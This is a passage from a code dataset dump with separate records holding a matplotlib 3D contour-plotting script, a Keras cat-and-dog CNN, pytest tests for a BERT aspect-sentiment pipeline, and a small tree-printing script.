x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'clock', 'counterclock', tick_1_size,\n args.label1, 'negative', label_1_size, float(args.label1pad), args.tick1format)\n\n if args.axis1loc == 'right' or args.axis1loc == 'both':\n project_axis(ax, p6x, p6y, p5x, p5y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'counterclock', 'counterclock', tick_1_size,\n args.label1, 'positive', label_1_size, float(args.label1pad), args.tick1format)\n\n # axis 2\n if args.axis2loc == 'top' or args.axis2loc == 'both':\n project_axis(ax, p8x, p8y, p2x, p2y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'clock', 'negative', tick_2_size,\n args.label2, 'negative', label_2_size, float(args.label2pad), args.tick2format)\n\n if args.axis2loc == 'bottom' or args.axis2loc == 'both':\n project_axis(ax, p5x, p5y, p3x, p3y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'counterclock', 'negative', tick_2_size,\n args.label2, 'negative', label_2_size, float(args.label2pad), args.tick2format)\n\n # axis 3\n if args.axis3loc == 'top' or args.axis3loc == 'both':\n project_axis(ax, p6x, p6y, p8x, p8y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'clock', 'negative', tick_3_size,\n args.label3, 'negative', label_3_size, float(args.label3pad), args.tick3format)\n\n if args.axis3loc == 'bottom' or args.axis3loc == 'both':\n project_axis(ax, p3x, p3y, p1x, p1y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'counterclock', 'negative', tick_3_size,\n args.label3, 'negative', label_3_size, float(args.label3pad), args.tick3format)\n\nif octant_4:\n\n # axis 1\n if args.axis1loc == 'left' or args.axis1loc == 'both':\n project_axis(ax, p2x, p2y, p1x, p1y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, 
size1, 'clock', 'counterclock', tick_1_size,\n args.label1, 'negative', label_1_size, float(args.label1pad), args.tick1format)\n\n if args.axis1loc == 'right' or args.axis1loc == 'both':\n project_axis(ax, p6x, p6y, p5x, p5y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'counterclock', 'counterclock', tick_1_size,\n args.label1, 'positive', label_1_size, float(args.label1pad), args.tick1format)\n\n # axis 2\n if args.axis2loc == 'top' or args.axis2loc == 'both':\n project_axis(ax, p8x, p8y, p6x, p6y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'counterclock', 'positive', tick_2_size,\n args.label2, 'positive', label_2_size, float(args.label2pad), args.tick2format)\n\n if args.axis2loc == 'bottom' or args.axis2loc == 'both':\n project_axis(ax, p1x, p1y, p3x, p3y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'clock', 'positive', tick_2_size,\n args.label2, 'positive', label_2_size, float(args.label2pad), args.tick2format)\n\n # axis 3\n if args.axis3loc == 'top' or args.axis3loc == 'both':\n project_axis(ax, p8x, p8y, p2x, p2y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'clock', 'negative', tick_3_size,\n args.label3, 'negative', label_3_size, float(args.label3pad), args.tick3format)\n\n if args.axis3loc == 'bottom' or args.axis3loc == 'both':\n project_axis(ax, p5x, p5y, p3x, p3y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'counterclock', 'negative', tick_3_size,\n args.label3, 'negative', label_3_size, float(args.label3pad), args.tick3format)\n\n# remove original figure frames\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nax.spines['bottom'].set_visible(False)\nax.spines['left'].set_visible(False)\n\n# remove original figure ticks and labels\nax.tick_params(which='both',\n top='off',\n bottom='off',\n labeltop='off',\n labelbottom='off',\n left='off',\n right='off',\n labelleft='off',\n labelright='off')\n\n## set colorbar\n# when using filled contour, the colorbar coding could be a little tricky\n# therefore dismissed -- little use anyway\n# colorbar for filled contour is also dismissed in 2D case (showcontour)\n# if args.legend and cmin != cmax:\nif False:\n\n lloc = args.lloc\n\n # colorbar values\n cp = 512\n cinterval = (cmax - cmin) / (cp - 1)\n temp = np.linspace(cmin, cmax, cp)\n cval = np.zeros([cp, 1])\n for i in range(0, cp):\n cval[i] = temp[i]\n\n if lloc in ['left', 'right']:\n\n if args.lheight is None:\n lheight = figheight\n else:\n lheight = float(args.lheight)\n if lheight > figheight:\n lheight = figheight\n\n if args.lwidth is None:\n lwidth = 0.2\n else:\n lwidth = float(args.lwidth)\n\n if lloc == 'right':\n\n # colorbar location\n if args.axis1loc == 'right' or args.axis1loc == 'both':\n pad = tick_1_size * ipp + float(args.tickmajorlen) * ipp + 0.5 + label_1_size * ipp\n else:\n pad = 0.2\n if args.lpad is None:\n cbpad = 0.0\n else:\n cbpad = 
float(args.lpad)\n pad = pad + cbpad\n cx = [p5x + pad, p5x + pad, p5x + pad + lwidth, p5x + pad + lwidth]\n dl = (figheight - lheight) / 2.0\n cy = [p3y + dl, p8y - dl, p8y - dl, p3y + dl]\n\n if args.lloc in ['top', 'bottom']:\n\n if args.lheight is None:\n lheight = 0.2\n else:\n lheight = float(args.lheight)\n\n if args.lwidth is None:\n lwidth = figwidth\n else:\n lwidth = float(args.lwidth)\n if lwidth > figwidth:\n lwidth = figwidth\n\n if lloc == 'bottom':\n\n # colorbar location\n if args.axis2loc == 'bottom' or args.axis2loc == 'both' or args.axis3loc == 'bottom' or args.axis3loc == 'both':\n pad = max(tick_2_size, tick_3_size) * ipp + float(args.tickmajorlen) * ipp + 0.2 + max(\n label_2_size, label_3_size) * ipp + 0.1 * abs(cos(angle1 * np.pi / 180.0))\n else:\n pad = 0.2\n if args.lpad is None:\n cbpad = 0.0\n else:\n cbpad = float(args.lpad)\n pad = pad + cbpad\n dl = (figwidth - lwidth) / 2.0\n cx = [p1x + dl, p5x - dl, p5x - dl, p1x + dl]\n cy = [p3y - pad, p3y - pad, p3y - pad - lheight, p3y - pad - lheight]\n\n # create colorbar\n cb = project_image(ax, cval, cx, cy, colormap, cmin, cmax)\n\n # crate colorbar frame\n line = [[(cx[0], cy[0]), (cx[1], cy[1]), (cx[2], cy[2]), (cx[3], cy[3]), (cx[0], cy[0])]]\n line = LineCollection(line, linewidth=1.0, color='k')\n ax.add_collection(line)\n\n if args.unitsize is None:\n lufs = min(float(args.label1size), float(args.label2size), float(args.label3size)) - 1\n else:\n lufs = float(args.unitsize)\n\n # tick font size\n if args.lticksize is None:\n ltfs = lufs - 1\n else:\n ltfs = float(args.lticksize)\n\n if args.norm == 'linear':\n\n # set colorbar major ticks\n if args.ld is None:\n ld = nice((cmax - cmin) / 5.0)\n else:\n ld = float(args.ld)\n\n if args.ltickbeg is None:\n ltickbeg = nice(cmin, 0.5)\n base = 0.5\n nb = 0\n while nb <= 10 and ltickbeg > cmin + ld:\n base = base / 10.0\n ltickbeg = nice(cmin, base)\n nb = nb + 1\n if abs(ltickbeg) < abs(cmax) and orderm(ltickbeg) + 2 < orderm(cmax):\n ltickbeg = 0.0\n else:\n ltickbeg = float(args.ltickbeg)\n if args.ltickend is None:\n ltickend = cmax\n else:\n ltickend = float(args.ltickend)\n\n # scalar\n maxtick = max(abs(ltickbeg), abs(ltickend))\n if maxtick >= 1.0e4 or maxtick <= 1.0e-3:\n scalar = int(floor(log10(maxtick)))\n cscale = pow(10, scalar)\n else:\n cscale = 1.0\n\n # set ticks\n ticks = np.arange(ltickbeg, ltickend + ld, ld)\n tbeg = max(cmin, ltickbeg)\n tend = min(cmax, ltickend)\n\n # set tick positions on colorbar\n ticks = np.asarray(\n [i for i in ticks if i >= tbeg - 1.0e-10 * abs(tbeg) and i <= tend + 1.0e-10 * abs(tend)])\n tick_labels = ['' for i in range(0, len(ticks))]\n for i in range(0, len(ticks)):\n tick_labels[i] = ('%f' % (ticks[i] / cscale)).rstrip('0').rstrip('.')\n\n # set minor ticks\n if args.lmtick != 0:\n # extend tail and head\n pticks = np.append(ticks, ticks[0] - ld)\n pticks = np.append(pticks, ticks[-1] + ld)\n # sort all major ticks\n pticks = np.sort(pticks)\n # get pseudo-location of minor ticks\n nt = len(pticks)\n mticks = []\n for i in range(0, nt - 1):\n mticks = np.append(mticks, np.linspace(pticks[i], pticks[i + 1], args.lmtick + 2))\n mticks = [i for i in mticks if (i not in pticks)]\n mticks = np.asarray(\n [i for i in mticks if i >= tbeg - 1.0e-10 * abs(tbeg) and i <= tend + 1.0e-10 * abs(tend)])\n\n if args.norm == 'log':\n\n # set colorbar major ticks\n if args.ltickbeg is None:\n ltickbeg = np.floor(cmin)\n else:\n ltickbeg = float(args.ltickbeg)\n if args.ltickend is None:\n ltickend = np.ceil(cmax)\n else:\n 
ltickend = float(args.ltickend)\n if args.ld is None:\n ld = max(1, round((ltickend - ltickbeg) / 5.0))\n else:\n ld = int(args.ld)\n\n ticks = np.arange(ltickbeg, ltickend + 1, ld)\n tbeg = max(cmin, ltickbeg)\n tend = min(cmax, ltickend)\n\n # set tick positions on colorbar\n ticks = np.asarray(\n [i for i in ticks if i >= tbeg - 1.0e-10 * abs(tbeg) and i <= tend + 1.0e-10 * abs(tend)])\n tick_labels = ['' for i in range(0, len(ticks))]\n for i in range(0, len(ticks)):\n tick_labels[i] = '$\\mathregular{10^{%i}}$' % (ticks[i])\n\n # colorbar minor ticks\n if args.lmtick != 0:\n # extend tail and head\n pticks = np.append(ticks, ticks[0] - ld)\n pticks = np.append(pticks, ticks[-1] + ld)\n # sort all major ticks\n pticks = np.sort(pticks)\n # get pseudo-location of minor ticks\n nt = len(pticks)\n mticks = []\n for i in range(0, nt - 1):\n mticks = np.append(mticks,\n np.log10(np.linspace(10**pticks[i], 10**pticks[i + 1], args.lmtick + 2)))\n mticks = np.asarray(\n [i for i in mticks if i >= tbeg - 1.0e-10 * abs(tbeg) and i <= tend + 1.0e-10 * abs(tend)])\n\n # add ticks by drawing lines\n if lloc == 'right':\n\n # add major ticks\n cbeg = cy[3]\n cend = cy[2]\n ticks = [(i - cmin) / (cmax - cmin) * (cend - cbeg) + cbeg for i in ticks]\n\n tx = [cx[2] for i in range(0, len(ticks))]\n ty = [i for i in ticks]\n last_tick = ty[-1]\n ticklen = float(args.tickmajorlen) * ipp\n tx2 = [i + ticklen for i in tx]\n ty2 = [i for i in ticks]\n ttx = [i + ticklen + 0.05 for i in tx]\n tty = [i for i in ticks]\n\n majortick = []\n e1 = list(zip(tx, ty))\n e2 = list(zip(tx2, ty2))\n for i in range(0, len(ticks)):\n majortick.append([e1[i], e2[i]])\n\n tick_major_width = 0.5\n majortick = LineCollection(majortick, linewidths=tick_major_width, colors='k')\n ax.add_collection(majortick)\n\n # add tick labels\n if args.norm == 'linear' and cscale != 1.0:\n tick_labels[-1] = r'$\\mathregular{\\times 10^{%i}}$' % scalar + '\\n' + tick_labels[-1]\n for i in range(0, len(ticks)):\n ax.text(ttx[i], tty[i], tick_labels[i], fontproperties=font, size=ltfs, ha='left', va='center')\n\n # add minor ticks\n if args.lmtick != 0:\n mticks = [(i - cmin) / (cmax - cmin) * (cend - cbeg) + cbeg for i in mticks]\n\n tx = [cx[2] for i in range(0, len(mticks))]\n ty = [i for i in mticks]\n ticklen = float(args.tickmajorlen) * ipp * 0.5\n tx2 = [i + ticklen for i in tx]\n ty2 = [i for i in mticks]\n ttx = [i + ticklen + 0.05 for i in tx]\n tty = [i for i in mticks]\n\n minortick = []\n e1 = list(zip(tx, ty))\n e2 = list(zip(tx2, ty2))\n for i in range(0, len(mticks)):\n minortick.append([e1[i], e2[i]])\n\n tick_minor_width = 0.5 * 0.75\n minortick = LineCollection(minortick, linewidths=tick_minor_width, colors='k')\n ax.add_collection(minortick)\n\n # set unit\n if args.unit is not None:\n if args.unitpad is None:\n upad = 0.05\n else:\n upad = float(args.unitpad)\n if args.norm == 'linear':\n maxlen = max([len(i) for i in tick_labels]) * 0.75\n if args.norm == 'log':\n maxlen = 3.5\n ux = cx[2] + ticklen * 2.0 + 0.025 + maxlen * ltfs * ipp + upad\n uy = 0.5 * (cbeg + cend)\n ct = ax.text(ux,\n uy,\n args.unit,\n size=lufs,\n fontproperties=font,\n rotation=270,\n ha='left',\n va='center')\n ct.set_size(lufs)\n\n # add ticks by drawing lines\n if lloc == 'bottom':\n\n # add major ticks\n cbeg = cx[0]\n cend = cx[1]\n ticks = [(i - cmin) / (cmax - cmin) * (cend - cbeg) + cbeg for i in ticks]\n\n ty = [cy[3] for i in range(0, len(ticks))]\n tx = [i for i in ticks]\n last_tick = tx[-1]\n ticklen = float(args.tickmajorlen) * ipp\n 
ty2 = [i - ticklen for i in ty]\n tx2 = [i for i in ticks]\n tty = [i - ticklen - 0.05 for i in ty]\n ttx = [i for i in ticks]\n\n majortick = []\n e1 = list(zip(tx, ty))\n e2 = list(zip(tx2, ty2))\n for i in range(0, len(ticks)):\n majortick.append([e1[i], e2[i]])\n\n tick_major_width = 0.5\n majortick = LineCollection(majortick, linewidths=tick_major_width, colors='k')\n ax.add_collection(majortick)\n\n # add tick labels\n if args.norm == 'linear' and cscale != 1.0:\n tick_labels[-1] = tick_labels[-1] + '\\n' + r'$\\mathregular{\\times 10^{%i}}$' % scalar\n for i in range(0, len(ticks)):\n ct = ax.text(ttx[i],\n tty[i],\n tick_labels[i],\n fontproperties=font,\n size=ltfs,\n ha='center',\n va='top')\n ct.set_size(ltfs)\n\n # add minor ticks\n if args.lmtick != 0:\n mticks = [(i - cmin) / (cmax - cmin) * (cend - cbeg) + cbeg for i in mticks]\n\n ty = [cy[3] for i in range(0, len(mticks))]\n tx = [i for i in mticks]\n ticklen = float(args.tickmajorlen) * ipp * 0.5\n ty2 = [i - ticklen for i in ty]\n tx2 = [i for i in mticks]\n tty = [i - ticklen - 0.05 for i in ty]\n ttx = [i for i in mticks]\n\n minortick = []\n e1 = list(zip(tx, ty))\n e2 = list(zip(tx2, ty2))\n for i in range(0, len(mticks)):\n minortick.append([e1[i], e2[i]])\n\n tick_minor_width = 0.5 * 0.75\n minortick = LineCollection(minortick, linewidths=tick_minor_width, colors='k')\n ax.add_collection(minortick)\n\n # set unit\n if args.unit is not None:\n if args.unitpad is None:\n upad = 0.05\n else:\n upad = float(args.unitpad)\n if args.norm == 'linear':\n maxlen = 1.50\n if args.norm == 'log':\n maxlen = 1.75\n ux = 0.5 * (cbeg + cend)\n uy = cy[3] - ticklen - 0.025 - maxlen * ltfs * ipp - upad\n ct = ax.text(ux, uy, args.unit, size=lufs, fontproperties=font, ha='center', va='top')\n ct.set_size(lufs)\n\n## set title\nif args.title is not None:\n\n if args.titlesize is None:\n title_font_size = max(float(args.label1size), float(args.label2size), float(args.label3size)) + 2\n else:\n title_font_size = float(args.titlesize)\n\n if args.titlex is None:\n if octant_1:\n title_x = 0.5 * (p2x + p6x)\n if octant_2:\n title_x = 0.5 * (p8x + p4x)\n else:\n title_x = float(args.titlex)\n\n if args.titley is None:\n if args.axis2loc == 'top' or args.axis2loc == 'both' or args.axis3loc == 'top' or args.axis3loc == 'both':\n title_y = p8y + 2 * max(label_2_size, label_3_size) * ipp + 0.1\n else:\n title_y = p8y + 0.25\n else:\n title_y = float(args.titley)\n\n ax.text(title_x,\n title_y,\n args.title,\n ha='center',\n fontproperties=fontbold,\n fontweight='bold',\n size=title_font_size)\n\n## set axis limits and aspect\nextra0 = 0.0\nextra1 = 0.0\n\n# x axis low limit\nif args.axis1loc == 'left' or args.axis1loc == 'both':\n extra0 = extra0 + float(args.tickmajorlen) * ipp * 1.25\n xlim0 = xlim[0] - extra0\nelse:\n xlim0 = xlim[0] - 0.05\n\n# x axis top limit\nif args.axis1loc == 'right' or args.axis1loc == 'both':\n extra1 = extra1 + float(args.tickmajorlen) * ipp * 1.25\n xlim1 = xlim[1] + extra1\nelse:\n xlim1 = xlim[1] + 0.1\n\nax.set_xlim([xlim0, xlim1])\n\nextra0 = 0.0\nextra1 = 0.0\n\n# y axis low limit\nif args.axis3loc == 'top' or args.axis3loc == 'both':\n extra0 = extra0 + float(args.tickmajorlen) * ipp * 1.25\n ylim0 = ylim[0] - extra0\nelse:\n ylim0 = ylim[0] - 0.1\n\n# y axis top limit\nif args.axis3loc == 'bottom' or args.axis3loc == 'both':\n extra1 = extra1 + float(args.tickmajorlen) * ipp * 1.25\n ylim1 = ylim[1] + extra1\nelse:\n ylim1 = ylim[1] + 0.05\n\nax.set_ylim([ylim0, ylim1])\n\n# set axis to appropritate 
ratio\nax.set_aspect('equal')\n\nplt.tick_params(\n axis='x', # changes apply to the x1-axis\n which='both', # both major and minor ticks are affected\n bottom=0, # ticks along the bottom axis\n top=0, # ticks along the top axis\n labelbottom=0, # labels along the bottom axis\n labeltop=0) # labels along the top axis\nplt.tick_params(\n axis='y', # changes apply to the x2-axis\n which='both', # both major and minor ticks are affected\n left=0, # ticks along the left axis\n right=0, # ticks along the right axis\n labelleft=0, # labels along the left axis\n labelright=0) # labels along the right axis\n\n## output\noutput(args)\n","sub_path":"src/showvolcon.py","file_name":"showvolcon.py","file_ext":"py","file_size_in_byte":78032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} {"seq_id":"382193014","text":"# Convolutional Neural Network\r\n\r\n# Importing the Keras libraries and Packages\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Convolution2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dense\r\n\r\n# Part 1. Building the Convolutional Neural Network (CNN)\r\n# Initialising the CNN\r\nclassifier = Sequential()\r\n\r\n# 1. Convolution\r\nclassifier.add(Convolution2D(32,3,3, input_shape=(64,64,3), activation='relu'))\r\n\r\n# 2. Pooling\r\nclassifier.add(MaxPooling2D(pool_size=(2,2)))\r\n\r\n# Adding a second CNN layer\r\nclassifier.add(Convolution2D(32,3,3, activation='relu'))\r\nclassifier.add(MaxPooling2D(pool_size=(2,2)))\r\n\r\n# 3. Flattening\r\nclassifier.add(Flatten())\r\n\r\n# 4. Full Connection\r\nclassifier.add(Dense(units=128, activation='relu'))\r\nclassifier.add(Dense(units=1, activation='sigmoid'))\r\n\r\n\r\n# Compiling the CNN\r\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\r\n\r\n\r\n# Part 2. Fitting the CNN to the images\r\n\r\n\r\nfrom keras_preprocessing.image import ImageDataGenerator\r\n\r\n\r\ntrain_datagen = ImageDataGenerator(\r\n rescale=1./255,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True)\r\n\r\n\r\ntest_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\ntraining_set = train_datagen.flow_from_directory('dataset/training_set',\r\n target_size=(64, 64),\r\n batch_size=32,\r\n class_mode='binary')\r\n\r\ntest_set = test_datagen.flow_from_directory('dataset/test_set',\r\n target_size=(64,64),\r\n batch_size=32,\r\n class_mode='binary')\r\n\r\nclassifier.fit(training_set,\r\n steps_per_epoch=8000/32,\r\n epochs=50,\r\n validation_data=test_set,\r\n validation_steps=2000/32)\r\n\r\n\r\n# Part 3. 
Making new predictions\r\n\r\nimport numpy as np\r\nfrom keras.preprocessing import image\r\n\r\ntest_image1 = image.load_img('single_prediction/cat_or_dog_1.jpg', target_size=(64,64))\r\ntest_image1 = image.img_to_array(test_image1)\r\ntest_image1 = np.expand_dims(test_image1, axis=0)\r\n\r\nresult1 = classifier.predict(test_image1)\r\ndog_cat1 = training_set.class_indices\r\n\r\nif result1[0][0] > 0.5:\r\n prediction1 = 'Dog'\r\nelse:\r\n prediction1 = 'Cat'\r\n \r\n\r\ntest_image2 = image.load_img('single_prediction/cat_or_dog_2.jpg', target_size=(64,64))\r\ntest_image2 = image.img_to_array(test_image2)\r\ntest_image2 = np.expand_dims(test_image2, axis=0)\r\n\r\nresult2 = classifier.predict(test_image2)\r\ndog_cat2 = training_set.class_indices\r\n\r\nif result2[0][0] > 0.5:\r\n prediction2 = 'Dog'\r\nelse:\r\n prediction2 = 'Cat'\r\n \r\n\r\n \r\n \r\n \r\n\r\n\r\n","sub_path":"cnn/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} {"seq_id":"574275743","text":"import pytest\nimport numpy as np\nimport transformers\nimport tensorflow as tf\n\nfrom aspect_based_sentiment_analysis import (\n BertABSClassifier,\n BertABSCConfig,\n BertPipeline,\n Sentiment,\n Example,\n load_examples\n)\nfrom aspect_based_sentiment_analysis.probing import (\n AttentionGradientProduct\n)\nnp.random.seed(1)\ntf.random.set_seed(1)\n\n\n@pytest.fixture\ndef nlp() -> BertPipeline:\n # Here, we do more integration-like tests rather than\n # mocked unit tests. We show how the pipeline works,\n # which is why we use this well-defined pipeline fixture.\n name = 'absa/classifier-rest-0.1'\n tokenizer = transformers.BertTokenizer.from_pretrained(name)\n # We pass a config explicitly (however, it can be downloaded automatically)\n config = BertABSCConfig.from_pretrained(name)\n model = BertABSClassifier.from_pretrained(name, config=config)\n nlp = BertPipeline(model, tokenizer)\n return nlp\n\n\ndef test_integration(nlp: BertPipeline):\n text = (\"We are great fans of Slack, but we wish the subscriptions \"\n \"were more accessible to small startups.\")\n slack, price = nlp(text, aspects=['slack', 'price'])\n assert slack.sentiment == Sentiment.positive\n assert price.sentiment == Sentiment.negative\n\n\ndef test_preprocess(nlp: BertPipeline):\n # We split a document into spans (in this case, into sentences).\n nlp.text_splitter = lambda text: text.split('\\n')\n raw_document = (\"This is the test sentence 1.\\n\"\n \"This is the test sentence 2.\\n\"\n \"This is the test sentence 3.\")\n task = nlp.preprocess(\n text=raw_document,\n aspects=['aspect_1', 'aspect_2']\n )\n assert len(task.subtasks) == 2\n assert list(task.subtasks) == ['aspect_1', 'aspect_2']\n assert len(task.batch) == 6\n assert task.indices == [(0, 3), (3, 6)]\n subtask_1, subtask_2 = task\n assert subtask_1.text == subtask_2.text == raw_document\n assert subtask_1.aspect == 'aspect_1'\n assert len(subtask_1.examples) == 3\n\n\ndef test_encode(nlp: BertPipeline):\n text_1 = (\"We are great fans of Slack, but we wish the subscriptions \"\n \"were more accessible to small startups.\")\n text_2 = \"We are great fans of Slack\"\n aspect = \"Slack\"\n\n examples = [Example(text_1, aspect), Example(text_2, aspect)]\n tokenized_examples = nlp.tokenize(examples)\n input_batch = nlp.encode(tokenized_examples)\n assert isinstance(input_batch.token_ids, tf.Tensor)\n # 101 the CLS token, 102 the SEP tokens.\n token_ids = 
input_batch.token_ids.numpy()\n values = [101, 2057, 2024, 2307, 4599, 1997, 19840, 102, 19840, 102]\n assert token_ids[1, :10].tolist() == values\n assert token_ids[0, :7].tolist() == values[:7]\n # The second sequence should be padded (shorter),\n # and attention mask should be set.\n assert np.allclose(token_ids[1, 10:], 0)\n attention_mask = input_batch.attention_mask.numpy()\n assert np.allclose(attention_mask[1, 10:], 0)\n # Check how the tokenizer marked the segments.\n token_type_ids = input_batch.token_type_ids.numpy()\n assert token_type_ids[0, -2:].tolist() == [1, 1]\n assert np.allclose(token_type_ids[0, :-2], 0)\n\n\ndef test_predict(nlp: BertPipeline):\n text_1 = (\"We are great fans of Slack, but we wish the subscriptions \"\n \"were more accessible to small startups.\")\n text_2 = \"We are great fans of Slack\"\n aspect = \"Slack\"\n examples = [Example(text_1, aspect), Example(text_2, aspect)]\n tokenized_examples = nlp.tokenize(examples)\n input_batch = nlp.encode(tokenized_examples)\n output_batch = nlp.predict(input_batch)\n assert output_batch.scores.shape == [2, 3]\n assert output_batch.hidden_states.shape == [2, 13, 25, 768]\n assert output_batch.attentions.shape == [2, 12, 12, 25, 25]\n assert output_batch.attention_grads.shape == [2, 12, 12, 25, 25]\n scores = output_batch.scores.numpy()\n assert np.argmax(scores, axis=-1).tolist() == [2, 2]\n\n\ndef test_label(nlp: BertPipeline):\n # We add the pattern recognizer to the pipeline.\n pattern_recognizer = AttentionGradientProduct()\n nlp.pattern_recognizer = pattern_recognizer\n\n text_1 = (\"We are great fans of Slack, but we wish the subscriptions \"\n \"were more accessible to small startups.\")\n text_2 = \"The Slack often has bugs.\"\n text_3 = \"best of all is the warm vibe\"\n aspect = \"slack\"\n examples = [Example(text_1, aspect),\n Example(text_2, aspect),\n Example(text_3, aspect)]\n\n tokenized_examples = nlp.tokenize(examples)\n input_batch = nlp.encode(tokenized_examples)\n output_batch = nlp.predict(input_batch)\n labeled_examples = nlp.label(tokenized_examples, output_batch)\n labeled_examples = list(labeled_examples)\n labeled_1, labeled_2, labeled_3 = labeled_examples\n assert labeled_1.sentiment == Sentiment.positive\n assert labeled_2.sentiment == Sentiment.negative\n assert isinstance(labeled_1.scores, list)\n assert np.argmax(labeled_1.aspect_representation.look_at) == 5\n assert np.argmax(labeled_2.aspect_representation.look_at) == 1\n\n # We need to calibrate the model. 
The prediction should be neutral.\n # In fact, the model does not recognize the aspect correctly.\n assert labeled_3.sentiment == Sentiment.positive\n assert np.allclose(labeled_3.aspect_representation.look_at,\n [1.0, 0.16, 0.50, 0.54, 0.34, 0.39, 0.12], atol=0.01)\n\n\ndef test_evaluate(nlp: BertPipeline):\n examples = load_examples(\n dataset='semeval',\n domain='restaurant',\n test=True\n )\n metric = tf.metrics.Accuracy()\n result = nlp.evaluate(examples[:10], metric, batch_size=10)\n result = result.numpy()\n # The model predicts the first 10 labels perfectly.\n assert result == 1\n result = nlp.evaluate(examples[10:20], metric, batch_size=10)\n assert np.isclose(result, 0.95)\n\n\ndef test_get_completed_task(nlp: BertPipeline):\n text = (\"We are great fans of Slack.\\n\"\n \"The Slack often has bugs.\\n\"\n \"best of all is the warm vibe\")\n # Make sure we have defined a text_splitter, even naive.\n nlp.text_splitter = lambda text: text.split('\\n')\n\n task = nlp.preprocess(text, aspects=['slack', 'price'])\n tokenized_examples = task.batch\n input_batch = nlp.encode(tokenized_examples)\n output_batch = nlp.predict(input_batch)\n aspect_span_labeled = nlp.label(tokenized_examples, output_batch)\n\n completed_task = nlp.get_completed_task(task, aspect_span_labeled)\n assert len(completed_task.batch) == 6\n assert completed_task.indices == [(0, 3), (3, 6)]\n\n slack, price = completed_task\n assert slack.text == price.text == text\n # The sentiment among fragments are different. We normalize scores.\n assert np.allclose(slack.scores, [0.06, 0.46, 0.48], atol=0.01)\n # Please note once gain that there is a problem\n # with the neutral sentiment, model is over-fitted.\n assert np.allclose(price.scores, [0.06, 0.42, 0.52], atol=0.01)\n","sub_path":"tests/core/test_pipeline.py","file_name":"test_pipeline.py","file_ext":"py","file_size_in_byte":7044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"548527310","text":"import random\n\ntree = [\n None,\n [\n None,\n None\n ],\n [\n None,\n 12,\n [\n None,\n 2,\n None\n ],\n None\n ],\n [\n None\n ]\n]\n\nt1 = [\n None,\n [\n None,\n None,\n [\n None,\n None\n ]\n ]\n]\n\nt2 = [\n None,\n [\n None,\n None\n ]\n]\n\ndef is_list(list):\n try:\n len(list)\n except TypeError:\n return False\n return True\n\ndef deeps(tree, lvl = ''):\n if not is_list(tree):\n return 0\n if not len(tree):\n return 0\n lvl += '.'\n for node in tree:\n print(lvl)\n deeps(node, lvl)\n \n\ndef assign(tree, leafs = [i for i in range(100)]):\n for i in range(len(tree) -1, -1, -1):\n if not is_list(tree[i]):\n if not len(leafs):\n return\n if not tree[i]:\n tree[i] = leafs.pop()\n\n else:\n assign(tree[i], leafs)\n\n\ndef draw_tree(tree, lvl = 0):\n if not is_list(tree) or not len(tree):\n s = ''\n for i in range(lvl):\n s += '┊\\t'\n return s + str(tree) + '\\n'\n lvl += 1\n s = ''\n for i in range(lvl-1):\n s += '┊\\t'\n s += '╭ ' + random.choice(['+','-','*','/','^','sin']) + '\\n'\n for node in tree:\n s += draw_tree(node, lvl)\n return s\n\n \n\nassign(t1)\nassign(t2)\nmeans = [t2, t1]\nassign(tree, means)\nprint(draw_tree(tree))","sub_path":"python_tasks/calculator/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"155768151","text":"## NEAREST-NEIGHBOR ALGORITHM\n\nfrom math import sqrt\nimport numpy as np\n\ntrain= open (\"cndd.txt\",\"r\")\ntest=open 
